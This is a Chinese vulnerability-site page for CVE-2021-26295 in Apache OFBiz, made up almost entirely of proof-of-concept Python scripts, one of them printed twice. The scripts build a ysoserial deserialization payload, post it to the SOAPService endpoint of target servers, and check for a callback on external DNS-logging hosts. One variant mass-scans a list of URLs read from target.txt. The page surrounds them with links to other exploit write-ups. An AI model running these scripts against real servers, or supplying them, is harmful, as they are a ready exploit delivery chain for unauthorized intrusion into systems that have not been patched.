CVE-2021-26295_Apache_OFBiz_RMI反序列化漏洞

030

# CVE-2021-26295 Apache OFBiz RMI反序列化漏洞

==漏洞影響==

Apache OFBiz < 17.12.06 ==POC== 

import requests
import sys
import sys
import subprocess
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print(‘+——————————————‘)
    print(‘+  \033[34mVersion: Apache OFBiz                                            \033[0m’)
    print(‘+  \033[36m使用格式:  python3 poc.py                                            \033[0m’)
    print(‘+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m’)
    print(‘+  \033[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             \033[0m’)
    print(‘+——————————————‘)

def trans(s):
    return “%s” % ”.join(‘%.2x’ % x for x in s)

def POC_1(target_url, Dnslog):
    popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial.jar’, “URLDNS”, Dnslog], stdout=subprocess.PIPE)
    data = popen.stdout.read()
    hex_data = trans(data)
    headers = {
        ‘Content-Type’: ‘text/xml’
    }
    post_data = ”’%s”’ % hex_data
    vuln_url = target_url + “/webtools/control/SOAPService”
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
        print(“\033[36m[o] 正在请求 {}/webtools/control/SOAPService….. \033[0m”.format(target_url))
        if response.status_code == 200:
            print(“\033[36m[o] 请检查 Dnslog 响应\n \033[0m”)
        else:
            print(“\033[31m[x] 请求失败 \033[0m”)
            sys.exit(0)

    except Exception as e:
        print(“\033[31m[x] 请求失败 \033[0m”)


if __name__ == ‘__main__’:
    title()
    target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
    Dnslog = str(input(“\033[35mDnslog >>> \033[0m”))
    POC_1(target_url, Dnslog)


==漏洞影響==

Apache OFBiz < 17.12.06 ==POC== 

import requests
import sys
import sys
import subprocess
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print(‘+——————————————‘)
    print(‘+  \033[34mVersion: Apache OFBiz                                            \033[0m’)
    print(‘+  \033[36m使用格式:  python3 poc.py                                            \033[0m’)
    print(‘+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m’)
    print(‘+  \033[36mDnslog      >>> http://xxx.xxx.xxx.xxx                             \033[0m’)
    print(‘+——————————————‘)

def trans(s):
    return “%s” % ”.join(‘%.2x’ % x for x in s)

def POC_1(target_url, Dnslog):
    popen = subprocess.Popen([‘java’, ‘-jar’, ‘ysoserial.jar’, “URLDNS”, Dnslog], stdout=subprocess.PIPE)
    data = popen.stdout.read()
    hex_data = trans(data)
    headers = {
        ‘Content-Type’: ‘text/xml’
    }
    post_data = ”’%s”’ % hex_data
    vuln_url = target_url + “/webtools/control/SOAPService”
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5)
        print(“\033[36m[o] 正在请求 {}/webtools/control/SOAPService….. \033[0m”.format(target_url))
        if response.status_code == 200:
            print(“\033[36m[o] 请检查 Dnslog 响应\n \033[0m”)
        else:
            print(“\033[31m[x] 请求失败 \033[0m”)
            sys.exit(0)

    except Exception as e:
        print(“\033[31m[x] 请求失败 \033[0m”)


if __name__ == ‘__main__’:
    title()
    target_url = str(input(“\033[35mPlease input Attack Url\nUrl >>> \033[0m”))
    Dnslog = str(input(“\033[35mDnslog >>> \033[0m”))
    POC_1(target_url, Dnslog)


==漏洞影響==

Apache OFBiz < 17.12.06 ==POC== 

#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
urllib3.disable_warnings()
def main():
    id = requests.get(“https://dns.xn--9tr.com/new_gen”).text.split(“.”)[0]
    if(not os.path.exists(“target.txt”)):
        exit(“put url in target.txt! “)
    if(not os.path.exists(“ysoserial.jar”)):
        exit(“where is ysoserial.jar?”)
    with open(“target.txt”)as f:
        urls = f.readlines()
    for url in urls:
        url = url.strip()
        uid = uuid.uuid1().hex
        cmd = “java -jar .\ysoserial.jar URLDNS http://{0}.{1}.y.dns1.tk > tmp”.format(uid,id)
        r = os.popen(cmd)   
        r.close()  
        with open(“tmp”,’rb’) as f:
            payload = binascii.hexlify(f.read())
        data = ”’
         
            
            
            
        
            
                
                    {0}
                
                
                    
                
            
        
            
            
            
            ”’.format(payload.decode())
        headers = {
            “user-agent”:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36″
        }
        url = url+”/webtools/control/SOAPService”
        try:
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
            requests.post(url,data=data,verify=False,headers=headers,timeout=5)
        except:
            pass
        dnslogresurl = “https://dns.xn--9tr.com/”+id
        if(uid in requests.get(dnslogresurl).text):
            print(“[+] {0} 漏洞存在”.format(url))
        else:
            print(“[-] {0} 漏洞不存在”.format(url))
    print(“[+] 请到 {0} 查看结果”.format(dnslogresurl))

if __name__ == “__main__”:
    main()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
喜欢就支持一下吧
点赞0赞赏 分享
棉花糖的头像-棉花糖会员站糖心会员
会员必看手册(1.8.6版本 25.12.1更新)-棉花糖会员站
会员必看手册(1.8.6版本 25.12.1更新)
会员必看手册(1.8.6版本 25.12.1更新)
2025年12月1日 3.7W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.4W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8535
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6171
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4552
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3709
相关推荐
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6171
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2403
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2275
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1953
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1792
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1685
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站糖心会员
恒友摄影ERP login.ashx 存在SQL注入
蓝凌EIS智慧协同平台mail_xml存在XXE注入
点晴MIS管理信息系统 login_out.asp 存在SQL注入
锐明技术Crocus系统RepairRecord存在SQL注入
迪博数据决策系统downloadImpTemplet存在任意文件读取
友加畅捷管理系统GetZTList存在信息泄露
最近一周热门文章

1会员必看手册(1.8.6版本 25.12.1更新)

棉花糖的头像-棉花糖会员站糖心会员2025年12月1日
3.7W+

2会员手册版本更新(恢复md5解密功能)

棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
812

3CVE-2025-55182 dify 无条件rce

棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
799

4普华科技PowerPms ForgotPassword 存在sql注入

棉花糖的头像-棉花糖会员站糖心会员2025年12月3日
9999756

5无境靶场练习:win11通关vulntarget-b

ll_12345的头像-棉花糖会员站糖心会员2025年12月1日
742

6XWiki Platform 文件读取 (CVE-2025-55749)

棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999704
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密